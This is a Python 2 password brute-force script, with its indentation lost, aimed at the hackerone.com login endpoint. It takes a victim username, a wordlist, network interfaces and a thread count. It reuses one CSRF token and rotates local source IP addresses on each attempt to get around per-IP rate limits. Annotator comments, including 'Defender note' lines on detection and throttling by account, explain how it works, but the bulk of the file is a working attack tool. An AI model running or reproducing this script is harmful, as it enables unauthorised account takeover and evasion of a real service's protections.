- #!/usr/bin/env python
- # sudo apt-get update && sudo apt-get --yes --force-yes upgrade && sudo apt-get --yes --force-yes install python-pip && sudo apt-get --yes --force-yes install python-dev && sudo pip install requests --upgrade && sudo pip install requests_toolbelt --upgrade && sudo pip install netifaces --upgrade
- import requests
- import time
- import json
- import sys
- import os
- import threading
- import Queue
- import requests
- import netifaces
- from requests_toolbelt.adapters import source
# Turns off urllib3 warnings for the whole process. That includes the
# InsecureRequestWarning that the verify=False request further down would
# otherwise print on every call.
- requests.packages.urllib3.disable_warnings()
# Worker thread: takes candidate passwords from a shared queue and submits each
# one to the login endpoint, binding every attempt to the next local source
# address in `ips`.
# NOTE(review): this paste lost its indentation, so the loop nesting described
# in the comments below is inferred from statement order -- confirm against an
# indented copy.
# Defender note: every attempt names the same account while the client address
# changes per request, so a limiter keyed only on client IP sees each address
# rarely. Throttling or lockout keyed on the target account is the control
# that addresses this pattern.
- class WorkerThread(threading.Thread):
# result_code strings the JSON login response is compared against in run().
- good_guess = "valid-credentials"
- bad_guess = "invalid-credentials"
# Stores the shared queue, thread id, address slice and flags, then opens one
# requests.Session and fetches one CSRF token for the lifetime of the thread.
- def __init__(self, queue, tid, ips, user, debug) :
- threading.Thread.__init__(self)
- self.queue = queue
- self.tid = tid
- self.user = user
- self.debug = debug
- self.session = requests.Session()
# Index of the next entry of self.ips to use.
- self.counter = 0
- self.ips = ips
# The token is read once here and sent unchanged on every POST in run().
# Detection signal: one CSRF token (and any session cookie the server set --
# not visible here) arriving from many different source addresses.
- response = self.session.get("https://hackerone.com/current_user")
- self.csrf = response.json()["csrf_token"]
# Thread body: loop until the queue yields nothing for 1 second.
- def run(self):
- while True:
- try :
- password = self.queue.get(timeout=1)
- except Queue.Empty :
- return
- #if self.debug:
- #print "[THREAD " + str(self.tid) + "] New attempt for " + self.user + ":" + password
# Retry loop for the current password (presumably nested in the loop above).
- while True:
- #time.sleep(4)
- try:
# Round-robin over self.ips: take the current entry, then advance and wrap.
- ip = self.ips[self.counter]
- if self.counter == len(self.ips) - 1:
- self.counter = 0
- else:
- self.counter = self.counter + 1
# Re-mount both schemes so the session's next request is bound to `ip` as its
# local source address.
- self.session.mount('http://', source.SourceAddressAdapter(ip))
- self.session.mount('https://', source.SourceAddressAdapter(ip))
# Login attempt. verify=False disables TLS certificate validation for this
# request. The email field is the module-level `victimusername`, not self.user.
- r = self.session.post("https://hackerone.com/sessions", headers={"Accept":"*/*","X-CSRF-Token":self.csrf}, data={"email":victimusername,"password":password}, verify=False)
# Bare except: any exception from the block above is printed as a POST error
# and the attempt is retried.
- except:
- print "[THREAD " + str(self.tid) + "] Error during POSTing. Retrying..."
- continue
# Response handling. Defender note: the 429 and 403 branches below are the two
# server responses that slow or stop this loop.
- if r.status_code == 200 and r.json()['result_code'] == self.good_guess:
- print "[SUCCESS] Found the right password: " + password
- exit(0)
- elif r.status_code == 200 and r.json()['result_code'] == self.bad_guess:
- if self.debug:
- print "[THREAD " + str(self.tid) + "] wrong password guess: " + password
# HTTP 429: wait 5 seconds, then retry the same password.
- elif r.status_code == 429:
- #if self.debug:
- print "[THREAD " + str(self.tid) + "] Rate limit triggered, sleeping now."
- time.sleep(5)
- continue
# HTTP 403 is treated as a Cloudflare captcha challenge; the worker calls exit(0).
- elif r.status_code == 403:
- #if self.debug:
- print "[THREAD " + str(self.tid) + "] Cloudflare captcha, killing this thread."
- exit(0)
# Any other response: print the body and status code.
- else:
- print r.text
- print r.status_code
- pass
# Leave the retry loop and mark the queue item as done (placement inferred).
- break
- self.queue.task_done()
# Command-line handling: requires a username, a wordlist path, a comma-separated
# interface list and a thread count. Any further argument switches debug on.
- if len(sys.argv) < 5:
- print "[INFO] Usage: python " + sys.argv[0] + " <USERNAME> <PASSWORD_DICTIONARY_FILENAME> <INTERFACES (CSV)> <THREADS> [DEBUG]"
- exit(0);
- victimusername = sys.argv[1]
- dictionaryname = sys.argv[2]
- interfaces = sys.argv[3].split(',')
- nbthreads = int(sys.argv[4])
- debug = False
- if len(sys.argv) > 5:
- debug = True
# Collect the addresses bound to each named interface that exists on this host.
# IPv4 addresses whose first octet is 10 or 127 are skipped, as are IPv6
# addresses whose first group is fe80. The IPv6 zone suffix after '%' is
# stripped before the address is stored.
# Defender note: the script depends on one host holding many distinct source
# addresses. Addresses on one interface commonly share a prefix, so rate limits
# that aggregate clients by network prefix rather than by single address reduce
# the effect of the rotation.
- ips = []
- for interface in interfaces:
- if interface in netifaces.interfaces():
- for ipv4 in netifaces.ifaddresses(interface)[netifaces.AF_INET]:
- if not (ipv4['addr'].split('.')[0] == "10" or ipv4['addr'].split('.')[0] == "127"):
- if debug:
- print "[INFO] Interface " + interface + " - IPv4 Address " + ipv4['addr']
- ips.append(ipv4['addr'])
- for ipv6 in netifaces.ifaddresses(interface)[netifaces.AF_INET6]:
- if not ipv6['addr'].split(':')[0] == "fe80":
- if debug:
- print "[INFO] Interface " + interface + " - IPv6 Address " + ipv6['addr'].split('%')[0]
- ips.append(ipv6['addr'].split('%')[0])
# Read the whole wordlist into memory and queue every line, whitespace-stripped.
- queue = Queue.Queue()
- passwordList = open(dictionaryname,'r').read().splitlines()
- total = len(passwordList)
- for password in passwordList :
- queue.put(password.strip()) # Push passwords onto queue
- start = time.time()
- threads = []
# Python 2 integer division: each thread receives an equal, contiguous slice of
# `ips` in the loop below.
- nbinterfacesperthread = len(ips) / nbthreads
- print "[INFO] Number of interfaces: " + str(len(ips))
- print "[INFO] Number of interfaces per thread: " + str(nbinterfacesperthread)
- print "[INFO] Total # threads: " + str(nbthreads)
- print "[INFO] Total # passwords: " + str(total)
# One daemon worker per thread index, each given its own slice of addresses.
- for i in range(0,nbthreads): # Loop through external IP addresses
- worker = WorkerThread(queue, i, ips[i*nbinterfacesperthread:(i+1)*nbinterfacesperthread], victimusername, debug)
- worker.setDaemon(True)
- worker.start()
- threads.append(worker)
# Progress loop: while any worker is alive, poll every 5 seconds and print the
# rate, a 20-character bar and the percentage. `current` counts items taken off
# the queue (total minus qsize).
- while any(i.is_alive() for i in threads):
- time.sleep(5)
- current = total - queue.qsize()
- seconds = (int)(time.time() - start)
# Once the queue is drained, wait for the workers to finish (nesting inferred).
- if current == total:
- for x in threads:
- x.join()
- percent = (current / float(total))
- speed = current / float(seconds)
- bar = ('=' * int(percent * 20))
- perc = int(percent * 100)
- sys.stdout.write("%.2f pw/s [%s] %s%% (%s/%s) \n" % (speed, bar, perc,current,total))
- sys.stdout.flush()
- print "[End] Total time: " + str((int)(time.time() - start)) + " seconds"